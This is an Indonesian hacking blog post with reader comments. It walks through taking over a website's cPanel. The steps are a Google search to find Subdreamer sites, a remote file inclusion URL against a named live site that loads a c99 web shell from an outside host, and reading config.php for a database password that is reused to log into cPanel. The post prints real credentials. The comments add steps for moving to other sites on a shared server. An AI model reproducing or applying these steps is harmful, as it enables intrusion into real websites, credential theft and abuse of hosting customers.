Hacking Cpanel Dengan C99

c99shell hacked sitesedikit info hack nih buat teman2
siapa tau bermanfaat. dicoba aja
iseng-iseng buat artikel tentang hacking cpanel dengan memakai script injeksi c99, coz sekedar refresh uda married susah Online [ 1 x seminggu , 2 jam ]. btw pertanyaannya apakah Cpanel itu ? yups Cpanel adalah merupakan pusat dari manajemen web site, CPanel atau istilah kerennya Control Panel adalah tempat dimana admin web untuk melakukan setting penuh dan control terhadap web yang akan dibuat atau istilahnya adalah CPANEL = Rumah yang masih kosong yang belum ada apa-apanya, nah disanalah nanti akan diisi perabotan-perabotan untuk melengkapi isi rumah tersebut, Cpanel sama juga seperti rumah, dan perabotannya bisa dikategorikan sebagai script web, script mail, script MySql, dll. Apakah CPANEL itu begitu penting dan berharga ? yups pertanyaan yang bagus jawabannya adalah IYA, karena bila CPANEL dalam suatu Web bisa dimasuki oleh para hacker maka dapat dipastikan bahwa web target berada dalam control sang hacker [ maaf saya bukan hacker J ] atau bila dilogikakan sama saja bila rumah kita berhasil di kuasain orang lain maka dipastikan orang lain tersebut bisa masuk kapan saja terhadap rumah kita. tapi apakah mudah rumah kita orang lain bisa masuk kerumah kita sedangkan rumah kita ada pengaman yaitu KUNCI, yups sama saja dengan CPANEL tidak semudah yang kita bayangkan karena untuk masuk ke area CPANEL membutuhkan kunci yaitu Username dan password, bila tidak maka anda dipastikan tidak akan bisa masuk ke dalam area CPANEL tersebut. Cukup jelas logika kita untuk berpikir , so sekarang kembali lagi ke pokok permasalahannya, penulis akan menerangkan pengambilan alih cpanel terhadap web target memakai kesalahan dari script logika pemograman dan kesalahan dari admin web tersebut, J
btw kita mulai penulis akan ambil suatu bug yang ada di script php dengan merk ‘subdreamer’ [ bisa diliat di www.subdreamer.com ], bug yang ada adalah : /skins/advanced/advanced2.php?pluginpath[0]= dengan file yang bermasalah adalah advanced2.php, kita akan coba cari target dengan memakai paman google.com dengan syntax : inurl:’ skins/advanced/advanced1.php?’, penulis ambil contoh situs luar negeri [ sebelumnya sudah member tahukan bug ke mail mereka sesuai dengan etika hacker ] J yaitu : http://www.cafesjakie.nl
Kita coba lakukan penetrasi terhadap situs target, dengan memakai phpshell maka akan didapat hasil :
http://www.cafesjakie.nl/skins/advanced/advanced2.php?pluginpath[0]= http://ernigalak.t35.com/mama.txt? Maka akan Nampak hasil seperti dibawah ini :

1 Hacking Cpanel Dengan C99

Ok’s kita berhasil masuk lewat belakang [ backdoor ] tetapi kita belum mendapat akses utama [ cpanel ] hanya bisa masuk lewat pintu belakang, so kita coba cari dimana letak akses utama [ cpanel ], perhatikan satu persatu file yang ada, kita bisa liat di atas file phpshell kita

2 Hacking Cpanel Dengan C99

Bahwa target berada di posisi safe-mode : OFF, dan disana kita bisa liat uid:65534(nobody), gid=65534(nobody), groups=65534(nobody) dengan user : gbremmer, good awal yang bagus untuk kita coba cari akses cpanel pada web target tersebut [bila belum mengerti akan uid,gid,groups bisa mempelajari OS berbasis open Source seperti LInUX, I love linux ], lanjut perhatikan di atas disana ada file /home/gremmer/public_html/skins/advanced, kita akan coba mendapatkan akses cpanel coba masuk ke halaman utama web target tersebut , klik folder public_html atau bila anda seorang admin web ,folder public_html = www , maka akan didapat hasil di bawah ini :

3 Hacking Cpanel Dengan C99

Perhatikan dengan seksama folder-folder tersebut, kita akan berpikir secara logika bahwa untuk menghubungkan database memerlukan suatu username dan password, biasanya letak keduanya berada dalam file config.php, configuration.php, koneksi.php [ tergantung dari pembuat script tersebut ], penulis coba kita akan klik folder includes [ biasanya secara default letak config.php di script subdreamer ada di dalam folder includes], maka akan didapat hasil :

4 Hacking Cpanel Dengan C99

Perhatikan disana ada 2 file yaitu config.php dan config.php.new, btw kita bisa liat ke-2 nya, hanya ada perbedaannya yaitu masalah byte –nya [ kemungkinan config.php.new hanya untuk update saja ], klik config.php maka akan didapat hasil :5 Hacking Cpanel Dengan C99

Blah perhatikan lagi didalam file config.php kita bisa melihat databse user lengkap dengan passwornya , Cuma disini kita tidak akan masuk ke dalam database tersebut karena kita akan mencoba mendapatkan akses utama yaitu cpanel web target, perhatikan dengan seksama di $dbname = gbremmer_subdreamer

$dbusername = gbremmer_subdrea, so secara logika gbremmer adalah nama dari user tersebut dan dibelakangnya adalah default nama dari hosting tersebut, dan perhatikan sekali lagi file $dbpassword = hiervomgb, merupakan dari password user tersebut untuk masuk kedalam database web target, stop, pertanyaannya apakah kita bisa masuk ke cpanel target tersebut ? pertanyaan yang bagus, disini penulis akan mengajak anda berpikir secara logika, pernahkah anda merasa aman untuk melakukan aktivitas di dunia maya [ internet ]? Untuk orang awam mungkin ini adalah pertanyaan yang bodoh, mungkin orang akan berpikir akan aman dan nyaman untuk urusan dunia internet [ hampir 80 % yang mengatakan demikian, sehingga untuk urusan password hanya satu password untuk banyak keperluan ] J, karena kita berpikiran begitu maka disinilah letak kesalahan dari kita sendiri [ tidak pernah mau tahu untuk urusan keamanan dalam internet ], so kembali ke akar permasalahannya, kita akan berpikir terbalik dari kebanyakan orang awam , kita akan coba memakai user name : gbremmer dan password : hiervomgb untuk mendapatkan akses utama dari cpanel target tersebut.

Mari kita buka URL : http://www.cafesjakie.nl/cpanel, liat halaman cpanel terproteksi oleh user name dan password ,

6 Hacking Cpanel Dengan C99

Bingung kan ? J, kita akan coba memasukkan username dan password yang kita dapat dari file config.php

7 Hacking Cpanel Dengan C99

Blar liatlah kita dapat memasuki cpanel target tersebut, dapat secara full melakukan control terhadapa admin tersebut hanya dengan bermodalkan logika tanpa harus susah payah J karena memakai kesalahan dari logika script pemograman dan dari admin tersebut [padahal penulis juga salah satu admin web di www.sekuritionline.net ]

8 Hacking Cpanel Dengan C99

Note :
- Belajar menjadi hacker adalah sesuatu yang menyenangkan yang susah adalah etika –nya- - Bila berhasil memasuki web target usahakan untuk memberi tahukan ke pihak yang terkait agar dapat dilakukan patch terhadap web tersebut [ sekalian minta donasi via e-gold ] J xixixixiix
- Jadikan hacking is art jangan merusak [ kecuali kalo kepepet ]J just kidding J
- Tanamkan ke diri kita sendiri bahwa untuk urusan dunia maya ga menjamin pure 100% aman, xixi jadi inget semboyan S-O team [ Nothing Secure in The world or Di dunia ini tidak ada yang aman or di atas langit masih ada langit ]J
- Jadikan pembelajaran untuk admin web bila kena webnya kena Deface ga usah lapor ke pihak berwenang [ ntar malah ngeluarin duit banyak JJJ
- Untuk admin selalu lakukan update patch secara otomatis atau manual, serta lakukan backup data web secara teraturJ ] seharusnya kita berterima kasih bahwa web kita diingatkan oleh para hacker tersebut, [ bukannya marah – marah dan ngomong di TV –TV ] bahwa web yang harganya diatas 200 juta bisa dikatakan aman

categories hack | jadul | datetime January 26, 2008 11:18 pm

RANDOM POST

11 Comments

  • By bdnriztq bparzlvu, February 4, 2008 @ 4:17 am

    sybdgqkn dikjutmo vkhuro efrqw iqujc qtporxmwf tjkwhl

  • By Pembaca, February 20, 2008 @ 5:35 pm

    oke bro..siap di praktekan neh…
    thx..pencerahaannya

  • By jadul, February 21, 2008 @ 7:58 am

    dicoba dan dicoba

  • By robie, February 26, 2008 @ 4:06 pm

    kok kelihatannya gampang. tapi saya coba mayan susah juga ya …

    nemu pass n user buat joomla nya aja, gak cpanel nya …

    :(

  • By jadul, February 27, 2008 @ 2:05 am

    dicoba bro….
    kalau dapat 1 backdoor …
    dicoba cari situs laen dalam 1 server.
    kemungkinan kan 1 server terdiri dari 1000 domain
    dicoba terus… pasti ada aja admin yang bego yang make pass sama dengan pass cpanel…
    untuk cek domain2 yang mangkal di server tersebut
    ls -al /etc/vdomainaliases
    -rw-r–r– 1 lol mail 0 Nov 22 03:17 adwords.xxx.com
    -rw-r–r– 1 lolita mail 0 Jan 23 18:35 xxx.com

    kemungkinan isi direktorynya seperti itu
    nah sekarang pintar2an kita bro

    coba masuk ke dir /home/lol/public_html

    pling……

    gimana bro???

  • By elf.artic, March 16, 2008 @ 5:56 pm

    kerennnn……….

  • By jadul, March 16, 2008 @ 10:12 pm

    selamat belajar bro
    yang penting kalau dapat cpanel jangan dirusak
    manfaatkan lah sebaik mungkin

  • By zend, April 16, 2008 @ 3:39 pm

    Klo masing2 vhost itu di jail gmn?apa mungkin kita bisa masuk ke ls -al /etc/vdomainaliases yang berisi ribuan domain?

  • By jadul, April 16, 2008 @ 10:17 pm

    coba aja.
    selama ada fungsi ls -al /etc/vdomainaliases
    kalau masuk ke direktory /home/xxx/public_html
    pasti ga bisa?
    tp ada juga yang bisa
    dicoba aja….
    tapi usahakan dapat backdoor yang nobody
    nobody is the best
    nobody tetep nobody

  • By sf, April 20, 2008 @ 12:10 pm

    ooiii,.,
    gwa KOook Gaa BIsaa2 ciy YAag,.HUHU

  • By campud, October 31, 2008 @ 12:58 pm

    bro phpshell kok ngak da lagi, bisa kasih tau dimana url na

Other Links to this Post

RSS feed for comments on this post. TrackBack URI

Leave a comment

:diem2: :bingung: :mataduit: :terkapar: :puyeng2: :diem2: :digetok: :serem: more »

WordPress Theme Design